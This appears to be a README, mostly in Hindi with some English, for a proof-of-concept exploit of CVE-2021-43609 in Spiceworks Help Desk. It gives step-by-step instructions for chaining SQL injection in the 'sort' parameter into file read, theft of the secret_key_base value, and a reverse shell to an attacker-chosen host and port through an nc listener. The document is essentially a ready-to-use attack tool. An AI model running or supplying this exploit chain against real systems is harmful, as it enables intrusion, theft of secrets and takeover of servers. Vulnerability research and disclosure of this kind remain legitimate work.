
CVE-2021-43609 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण जो Spiceworks हेल्प डेस्क सॉफ़्टवेयर के विरुद्ध SQL इंजेक्शन से फ़ाइल रीड से दूरस्थ कोड निष्पादन श्रृंखला तक प्रदर्शित करता है।
Spiceworks के sort पैरामीटर में एक SQLi है। पूर्ण शोषण श्रृंखला SQLi -> फ़ाइल पढ़ना -> RCE है।
apt update && apt install -y ruby-dev nodejs python3 python3-pip libsqlite3-dev
pip3 install requests
gem install bundler && cd rce && bundle install
SQLi -> फ़ाइल पढ़ना का शोषण करने और secret_key_base एनवायरनमेंट वेरिएबल निकालने के लिए poc.py का उपयोग करें। यह तब poc.py से प्राप्त मानों के साथ रिवर्स शेल प्राप्त करने के लिए एक PoC रूबी स्क्रिप्ट जनरेट करेगा।
usage: poc.py [-h] --rhost RHOST --lhost LHOST --lport LPORT -u USER -p PASSWORD [-e ENV_PATH]
There's a SQLi in a `sort` parameter of Spiceworks. The exploit chain is SQLi -> file read -> RCE.
optional arguments:
-h, --help show this help message and exit
--rhost RHOST https://example.com
--lhost LHOST 10.10.10.10
--lport LPORT 9001
-u USER, --user USER [email protected]
-p PASSWORD, --password PASSWORD
P@$$w0rd!
-e ENV_PATH, --env_path ENV_PATH
Path to environment variables
rce.rb का उपयोग करें। चरण 1 में दिए गए IP और पोर्ट पर एक nc लिसनर चालू करें, फिर बस:
cd rce && ruby rce.rb
वोइला!